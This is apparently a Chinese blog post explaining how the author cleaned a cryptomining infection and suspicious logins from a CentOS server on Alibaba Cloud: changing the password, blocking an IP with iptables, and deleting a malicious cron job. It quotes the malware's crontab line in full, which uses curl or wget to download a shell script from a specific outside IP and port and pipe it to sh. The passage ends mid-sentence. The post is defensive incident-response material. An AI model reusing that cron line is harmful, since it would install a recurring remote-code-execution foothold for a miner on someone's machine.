阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。
出现这样的情况,需要根据以下的步骤去处理
第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。
第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下
iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP
iptables -L -n -v //查看防火墙当前的状态
第三步:删除挖矿病毒程序,大部分的程序无法是常驻内部并且增加一个守护进程,或者直接在crontab中加入定时任务;
我们先解决最简单的,把crontab中的可疑定时任务删除。
输入crontab -e查看,发现以下的定时任务
*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh
根据此命令去查找相应的病毒文件,使用rm命令把存的非法文件删除
rm /usr/bin/uzmnfa4 //其它的文件类同,
其中curl -m180 -fsSL http://68.183.140.39:8000/i.sh和wget -q -T180 -O